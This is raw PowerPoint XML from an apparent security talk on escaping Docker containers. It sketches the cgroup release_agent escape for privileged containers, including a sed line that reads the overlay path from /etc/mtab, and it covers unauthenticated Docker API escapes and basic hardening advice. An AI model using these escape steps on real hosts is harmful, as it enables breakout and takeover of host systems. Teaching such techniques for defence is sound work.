          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Emptying all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tasks/processes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7138555" y="2500861"/>
            <a:ext cx="1506681" cy="439766"/>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7117773" y="2500861"/>
            <a:ext cx="1548245" cy="48133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74516" y="5813901"/>
            <a:ext cx="3685282" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Command mentioned in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>release_agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> is executed in kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6876933" y="2969491"/>
            <a:ext cx="1435794" cy="3512828"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>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Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>34</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>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1894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141413" y="618518"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping container Running with </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Content Placeholder 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3547290099"/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>35</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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7569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141413" y="618518"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping container Running with </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="883920" y="3953871"/>
            <a:ext cx="2733993" cy="596177"/>
            <a:chOff x="-13653" y="1472767"/>
            <a:chExt cx="2490153" cy="596177"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1472767"/>
              <a:ext cx="2476500" cy="596177"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:schemeClr val="dk1">
                <a:alpha val="0"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>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TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-13653" y="1472767"/>
              <a:ext cx="2490153" cy="5961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8016" tIns="45720" rIns="128016" bIns="45720" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="800100">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1" smtClean="0"/>
                <a:t>rdma</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1" smtClean="0"/>
                <a:t>release_agent</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Left Brace 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3817619" y="3608459"/>
            <a:ext cx="495300" cy="1287000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 35000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>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6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4311331" y="3926161"/>
            <a:ext cx="6736080" cy="651595"/>
            <a:chOff x="3169919" y="1445058"/>
            <a:chExt cx="6736080" cy="651595"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3169919" y="1445058"/>
              <a:ext cx="6736080" cy="651595"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0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 name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3169919" y="1445058"/>
              <a:ext cx="6736080" cy="6515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1" algn="l" defTabSz="889000">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" err="1" smtClean="0"/>
                <a:t>var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0"/>
                <a:t>/lib/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" err="1" smtClean="0"/>
                <a:t>docker</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0"/>
                <a:t>/overlay2/HASH/diff/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" i="1" kern="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>command</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4840292" y="2366736"/>
            <a:ext cx="5678157" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -n 's/.*\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>perdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=\([^,]*\).*/\1/p' /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mtab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Left Brace 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6307298" y="964796"/>
            <a:ext cx="776284" cy="4511040"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 35000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>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4" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>36</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>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46606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a:xfrm>
            <a:off x="11201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>37</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6402042"/>
            <a:ext cx="2245360" cy="31943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extBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1959292" y="3037840"/>
            <a:ext cx="8270240" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Demo 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="618518"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping container Running with </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9586892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141413" y="618518"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unauthenticated Docker API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>38</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1959292" y="3037840"/>
            <a:ext cx="8270240" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Demo 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23309847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141413" y="618518"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basic Hardening</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>39</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1859340"/>
            <a:ext cx="9905998" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Run containers as non-root user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Do not run containers with --privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
